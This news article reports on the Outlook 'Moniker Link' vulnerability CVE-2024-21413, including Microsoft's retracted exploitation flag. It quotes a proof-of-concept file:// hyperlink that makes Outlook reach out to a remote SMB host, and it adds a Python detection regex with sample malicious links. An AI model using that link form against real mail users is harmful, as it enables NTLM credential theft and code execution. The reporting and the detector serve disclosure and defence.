Update February 14, 16:50 EST: Article and title revised after Microsoft retracted the "active exploitation" update added to the CVE-2024-21413 advisory.

Microsoft says remote unauthenticated attackers can trivially exploit a critical Outlook security vulnerability that also lets them bypass the Office Protected View.

Discovered by Check Point vulnerability researcher Haifei Li and tracked as CVE-2024-21413, this bug leads to remote code execution (RCE) when opening emails with malicious links using a vulnerable Microsoft Outlook version.

This happens because the flaw also enables attackers to bypass the Protected View (designed to block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.

Redmond also warned that the Preview Pane is an attack vector for this security flaw, allowing successful exploitation even when previewing maliciously crafted Office documents.

Unauthenticated attackers can exploit CVE-2024-21413 remotely in low-complexity attacks that don't require user interaction.

"An attacker who successfully exploited this vulnerability could gain high privileges, which include read, write, and delete functionality," Microsoft explains.

"An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE)."

CVE-2024-21413 affects multiple Office products, including Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (under extended support).

Exclamation mark to bypass Outlook protections

As explained by Check Point in a report published today, the vulnerability they dubbed Moniker Link allows attackers to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol and adding an exclamation mark to URLs pointing to attacker-controlled servers.

The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used "something"), as shown below:

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

This type of hyperlink bypasses Outlook's security restrictions, and Outlook will access the "\\10.10.111.111\test\test.rtf" remote resource when the link is clicked without throwing any warnings or errors.
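A defensive check for the link shape described above, as an added example that is not from the original article or from Check Point's report: it scans an HTML mail body for hrefs that target a remote host over file:// or a UNC path and carry an "!" right after the file extension. The function name, the regex and the sample body are constructed for illustration, and the heuristic is an assumption, not Microsoft's or Check Point's detection logic.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Heuristic (assumption): optional file: scheme, a remote host, a path ending in
# an extension, then "!" plus trailing text. Drive-letter (local) paths are skipped.
MONIKER_RE = re.compile(
    r"^(?:file:/*)?[\\/]{2}(?P<host>[^\\/:]+)[\\/]"
    r"(?P<path>[^!]*\.\w{1,8})!(?P<item>.*)$",
    re.IGNORECASE,
)

# Constructed sample mail body: one benign link, the article's example link,
# a file:// link without "!", and a percent-encoded variant.
SAMPLE_BODY = r'''
<p>Quarterly report: <a href="https://example.com/report.pdf">download</a></p>
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
<a href="file://fileserver.example/share/notes.docx">notes</a>
<a href="FILE:///\\192.0.2.7\s\a.rtf%21x">encoded</a>
'''


class _HrefCollector(HTMLParser):
    """Collects every href attribute; HTMLParser decodes HTML entities for us."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def find_moniker_links(html_body):
    """Return (original_href, remote_host, text_after_bang) for each suspicious link."""
    collector = _HrefCollector()
    collector.feed(html_body)
    findings = []
    for href in collector.hrefs:
        # Undo percent-encoding so "%21" cannot hide the exclamation mark.
        match = MONIKER_RE.match(unquote(href.strip()))
        if match:
            findings.append((href, match.group("host"), match.group("item")))
    return findings


if __name__ == "__main__":
    for href, host, item in find_moniker_links(SAMPLE_BODY):
        print(f"suspicious link to {host} (suffix {item!r}): {href}")
```

A hit is a reason to quarantine or review the message, and the extracted host is a candidate for outbound SMB blocking and log correlation.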

The flaw was introduced because of the unsafe MkParseDisplayName API, so the vulnerability may also impact other software that uses it.

The impact of attacks successfully exploiting CVE-2024-21413 includes theft of NTLM credential information, arbitrary code execution via maliciously crafted Office documents,

"We've confirmed this #MonikerLink bug/attack vector on the latest Windows 10/11 + Microsoft 365 (Office 2021) environments," Check Point said.

"Other Office editions/versions are likely affected, too. In fact, we believe this is an overlooked issue which existed in the Windows/COM ecosystem for decades, since it lies in the core of the COM APIs. We strongly recommend all Outlook users apply the official patch as soon as possible."

Microsoft updated the CVE-2024-21413 security advisory today to warn that this Outlook bug was also being exploited in attacks as a zero-day before this month's Patch Tuesday.

However, the company reverted the change saying that it "mistakenly updated exploited flag and exploitability assessment to indicate exploitation existed."
